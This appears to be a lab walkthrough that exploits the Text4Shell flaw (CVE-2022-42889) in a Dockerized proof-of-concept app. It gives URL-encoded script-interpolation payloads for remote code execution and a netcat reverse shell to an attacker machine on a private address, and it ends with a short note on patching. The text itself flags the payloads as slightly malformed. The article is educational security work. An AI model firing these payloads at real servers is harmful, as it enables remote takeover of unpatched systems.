Exploiting ‘Text4Shell’ vulnerability (CVE-2022–42889)
Summary
This article shows how an attacker could exploit the Text4Shell Vulnerability (CVE-2022–42889). For this purpose we will use U. J. Karthik’s PoC application text4shell-poc.jar.
Disclaimer
This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
The Text4shell vulnerability was disclosed to Apache on 13th October 2022. Text4Shell is a vulnerability affecting Java products that use certain features of the Apache Commons Text Library, which may allow remote attackers to execute arbitrary code on the server. For more information, see https://www.tarlogic.com/blog/cve-2022-42889-critical-vulnerability-affects-apache-commons-text/#CVE-2022-42889_Key_Features.
Vulnerable applications have the following characteristics:
- Using Apache Commons versions 1.5 to 1.9
- This library is used with sting manipulation
In this PoC, we will use a Dockerized test application “text4shell-poc.jar”. This test application was created by U J Karthik, an ethical hacker / developer from Delhi (https://github.com/karthikuj).
The POC consists of a Linux machine (our victim) and one attacker machine (Kali Linux 2022.3 release).
Victim (installation of text4shell-poc.jar)
— Ubuntu 20.04 (x64)
— IP-Address: 192.168.62.174
Attacker (for reverse shell)
— Kali Linux
— IP-Address: 192.168.62.161
The next sections include:
- Steps 1–3: Install requirements for vulnerable application
- Steps 4–8: Install the vulnerable application
- Steps 9–13: Perform Remote Code Execution on the vulnerable web application
- Steps 14–15 Setup a reverse shell with the attacker machine
- Mitigation
- Credits
Install requirements for vulnerable application
In order to get the vulnerable Java application up and running, we need to install OpenJDK, Maven and Docker.
1. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Install OpenJDK
sudo apt update && sudo apt install openjdk-11-jdk
2. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
We already have docker installed.
which docker
If you don’t have docker:
sudo apt install docker.io containerd runc
3. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Install Maven in /opt
cd /tmp
wget https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
tar -xvf apache-maven-3.6.3-bin.tar.gz
sudo mv apache-maven-3.6.3 /opt/
Set the environment parameters
M2_HOME='/opt/apache-maven-3.6.3'
PATH="$M2_HOME/bin:$PATH"
export PATH
Install the vulnerable application
4. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Download PoC application
cd /tmp
git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
5. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Use maven to build the application.
cd /tmp/cve-2022-42889-text4shell-docker/
mvn clean install
6. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Build the docker container for the vulnerable application.
docker build --tag=text4shell .
7. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Start the docker image.
docker run -p 80:8080 text4shell
8. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Test the application on the victim machine.
firefox http://localhost/text4shell/attack?search=blablabla
Perform Remote Code Execution on the vulnerable web application
Now, use the attacker machine for further exploitation.
9. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Test the application on our attacker machine.
firefox http://192.168.62.174/text4shell/attack?search=blablabla
10. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Now attack the remote web server by passing a string “${prefix:name}”.
http://192.168.62.174/text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec'touch /tmp/foo’)}
Important: the above string contains: “exec.'touch”. This is not correct, it must be “.exec('touch”. Because of the Medium.com input validation, it was not possible to use “.exec'(touch”. Add the missing "(" manually.
Url encode the above string (https://www.urlencoder.org/).
http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27touch%20%2Ftmp%2Ffoo%27%29%7D
Important: the above string contains: ".exec%27". This is not correct, it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to use “.exec%28%27”. Add the missing “%28“ manually..
11. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Get the docker container id
docker container ls
12. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Start a bash shell inside the docker container. Use docker exec -it <container_id> bash
docker exec -it 4bc32732e273 bash
13. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Check if the RCE was successful. (You should see a file named foo created in the /tmp directory):
ls /tmp
We have a folder called ‘Foo’, RCE was successful.
Setup a reverse shell with the attacker machine
We are lucky to find netcat inside the application docker container. We can use the local netcat version to setup a reverse shell.
14. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Setup a netcat listener.
rlwrap nc -nlvp 443
15. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Construct the payload:
${script:javascript:java.lang.Runtime.getRuntime().exec’nc 192.168.62.161 443 -e /bin/bash’)}
Important: the above string contains: “.exec'nc”. This is not correct, it must be “.exec('nc”. Because of the Medium.com input validation, it was not possible to use “.exec('nc”. Add the missing “(“ manually.
URL encoded the payload
http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27nc%20192.168.62.161%20443%20-e%20%2Fbin%2Fbash%27%29%7D
Important: the above string contains: “.exec%27”. This is not correct, it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to use “.exec%28%27”. Add the missing “%28“ manually
Now check our Kali reverse listener.
Mitigation
Apache has released a patch in the form of a new version of the Commons Text Library version 1.10. Installing this new version mitigates the vulnerability.
Credits
Special credits to U. J. Karthik for this PoC application (https://github.com/karthiku)
Credits to those researchers that discovered this vulnerability and disclosed it first to Apache.